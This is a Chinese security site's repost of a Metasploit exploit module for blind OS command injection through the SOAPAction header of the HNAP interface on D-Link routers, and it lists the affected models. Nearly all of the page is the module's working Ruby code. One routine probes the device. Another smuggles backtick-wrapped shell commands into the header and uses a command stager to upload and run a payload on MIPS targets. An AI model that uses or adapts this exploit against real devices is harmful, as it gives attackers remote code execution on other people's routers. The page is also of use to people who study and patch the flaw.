首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link Devices HNAP SOAPAction-Header Command Execution
来源:metasploit.com 作者:Messner 发布时间:2015-06-02  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
      'Description' => %q{
        Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
        interface. Since it is a blind OS command injection vulnerability, there is no
        output for the executed command. This module has been tested on a DIR-645 device.
        The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
        DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
        DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
      },
      'Author'      =>
        [
          'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
          'Craig Heffner',  # independent Vulnerability discovery on different other routers
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
          ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
        ],
      'DisclosureDate' => 'Feb 13 2015',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Targets' =>
        [
          [ 'MIPS Little Endian',
            {
              'Arch'     => ARCH_MIPSLE
            }
          ],
          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
            {
              'Arch'     => ARCH_MIPSBE
            }
          ]
        ],
      'DefaultTarget'    => 0
      ))

      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  def check
    uri = '/HNAP1/'
    soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'GET',
        'headers' => {
          'SOAPAction' => soap_action,
          }
      })

      if res && [200].include?(res.code) && res.body =~ /D-Link/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exploit
    print_status("#{peer} - Trying to access the device ...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
    end

    print_status("#{peer} - Exploiting...")

    execute_cmdstager(
      :flavor  => :echo,
      :linemax => 200,
      :temp    => ''
    )
  end

  def execute_command(cmd, opts)

    uri = '/HNAP1/'

    # we can not use / in our command so we need to use a little trick
    cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
    soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"

    begin
      res = send_request_cgi({
        'uri'    => uri,
        'method' => 'GET',
        'headers' => {
          'SOAPAction' => soap_action,
          }
      }, 3)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM Security AppScan 9.0.2 Rem
·Microsoft Windows - Local Priv
·WebDrive 12.2 Buffer Overflow
·PonyOS <= 3.0 - tty ioctl() Lo
·PonyOS 3.0 VFS Privilege Escal
·Seagate Central 2014.0410.0026
·PonyOS <= 3.0 - ELF Loader Pri
·Seagate Central 2014.0410.0026
·Realtek SDK Miniigd UPnP SOAP
·Jildi FTP Client Buffer Overfl
·Airties login-cgi Buffer Overf
·Jildi FTP Client 1.5.6 (SEH) B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved